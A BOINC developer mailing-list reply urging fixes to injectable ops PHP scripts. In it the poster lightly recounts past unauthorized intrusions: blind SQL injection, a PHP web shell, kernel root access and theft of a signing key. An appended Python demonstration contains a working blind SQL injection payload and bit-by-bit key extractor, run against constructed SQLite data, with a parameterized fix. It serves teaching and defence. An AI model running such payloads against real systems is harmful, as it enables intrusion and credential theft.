2013/4/28, Peter Schlaile <[email protected]>:
> Hi,
>
> I don't know if anyone cares (or I'm overly paranoid), but there are
> several php scripts in the operators panel that unintentionally will give
> you either complete shell access to the machine running the boinc server
> or full mysql server access.
The ops scripts are all horribly insecure, and nobody cares because they
aren't supposed to be public. The argument is that if someone gets access
to the ops pages, you're already in trouble no matter what.

I can give two real counter-examples:

- July 2009: The admin of a well-established public project copies an ops
  script to the public view for users' curiosity. That particular script
  was harmless, in the sense that it was read-only (didn't let users alter
  anything) and didn't show any private information. However, there was a
  SQL injection through which I could get 1 bit of information from the
  database (by making the query either give the usual results or give an
  error). Eventually I managed to get the project admin's account key one
  bit at a time. I emailed the admin his own account key and he promptly
  panicked and removed the script from public access :)

  I don't remember if I reported the SQL injection back then. I also
  don't remember which PHP script it was, and related chat logs etc. are
  probably on my old computer, so I'll have to look tomorrow. Either way,
  finding SQL injections in ops code is like finding hay in a haystack, so
  it doesn't matter much which one it was in this particular case.

- As you said, there's a difference between the admin access inherently
  provided by ops pages, and getting full access to the machine via a
  shell injection. September 2009: I completely pwned a new project server
  via shell injection on unprotected ops pages. Running useful commands
  through the injection got annoying quickly, so I installed one of those
  fancy "PHP shells" (web-based access to bash). Then I noticed the
  server's operating system was several years old and unpatched, so I got
  *root* access through a kernel bug too. And the project's code signing
  key.
  http://mid.gmane.org/[email protected]

  Nothing like having fun and computer security education at someone
  else's expense. Ahem.
Another reason to fix any escaping issue in ops code is avoiding problems
with correct user input. It wouldn't surprise me if you, as the legitimate
project admin, get SQL errors trying to search for a user with an
apostrophe in their name.

-- 
Nicolás

_______________________________________________
boinc_dev mailing list
[email protected]
http://lists.ssl.berkeley.edu/mailman/listinfo/boinc_dev
To unsubscribe, visit the above URL and
(near bottom of page) enter your email address.
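The two failures described in this message (a blind SQL injection that leaks one bit per request, and a legitimate name with an apostrophe producing a SQL error) share one root cause: user input concatenated into the query string. The following is an added example, not code from the BOINC project or from either poster. It stands in for a PHP/MySQL ops "find user" script with Python and an in-memory SQLite database; the user table, the column name `authenticator` and the account-key values are constructed for the demonstration. The error trigger in the oracle (abs() of the smallest 64-bit integer) is SQLite-specific; a payload aimed at MySQL would need a different error source, but the one-bit-per-query technique is the same.

```python
import sqlite3

# Constructed sample data standing in for a project's user table.
# The authenticator (BOINC's per-user account key) values are made up.
SAMPLE_USERS = [
    (1, "admin", "deadbeef0123456789abcdef01234567"),
    (2, "O'Brien", "0123456789abcdef0123456789abcdef"),
]


def make_db():
    """Fresh in-memory database with the constructed user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT, authenticator TEXT)"
    )
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_user_vulnerable(conn, name):
    """Stand-in for an ops script that pastes the search string into SQL.
    Raises sqlite3.Error when the resulting statement is malformed."""
    sql = "SELECT name FROM user WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_user_safe(conn, name):
    """Same query with a bound parameter: the input is data, never SQL."""
    sql = "SELECT name FROM user WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


def bit_is_set(conn, victim, pos, bit):
    """One-bit oracle against the vulnerable lookup: the query either
    returns its usual rows (bit set) or raises an error (bit clear).
    The error source, abs() of the smallest 64-bit integer, is SQLite-
    specific; the '0*id' term keeps the expression row-dependent so the
    engine cannot pre-evaluate it before the WHEN branch is chosen."""
    payload = (
        "%s' AND (CASE WHEN (unicode(substr("
        "(SELECT authenticator FROM user WHERE name = '%s'), %d, 1)) & %d) "
        "THEN 1 ELSE abs(-9223372036854775807 - 1 - 0*id) END) -- "
        % (victim, victim, pos, 1 << bit)
    )
    try:
        lookup_user_vulnerable(conn, payload)
        return True
    except sqlite3.Error:
        return False


def extract_authenticator(conn, victim, length=32):
    """Rebuilds the victim's account key one bit per query. Seven bits per
    character cover a hex string, so a 32-character key costs 224 requests."""
    chars = []
    for pos in range(1, length + 1):
        code = 0
        for bit in range(7):
            if bit_is_set(conn, victim, pos, bit):
                code |= 1 << bit
        chars.append(chr(code))
    return "".join(chars)


def apostrophe_breaks_query(conn, lookup):
    """True if a legitimate name containing an apostrophe makes the given
    lookup raise a SQL error instead of returning a result."""
    try:
        lookup(conn, "O'Brien")
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    db = make_db()
    print("leaked admin key:", extract_authenticator(db, "admin"))
    print("vulnerable lookup errors on O'Brien:",
          apostrophe_breaks_query(db, lookup_user_vulnerable))
    print("safe lookup finds O'Brien:", lookup_user_safe(db, "O'Brien"))
```

The same fix (a bound parameter) closes both problems at once: the injected payload is now compared literally against the `name` column and matches nothing, and a search for O'Brien returns the row instead of a syntax error.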
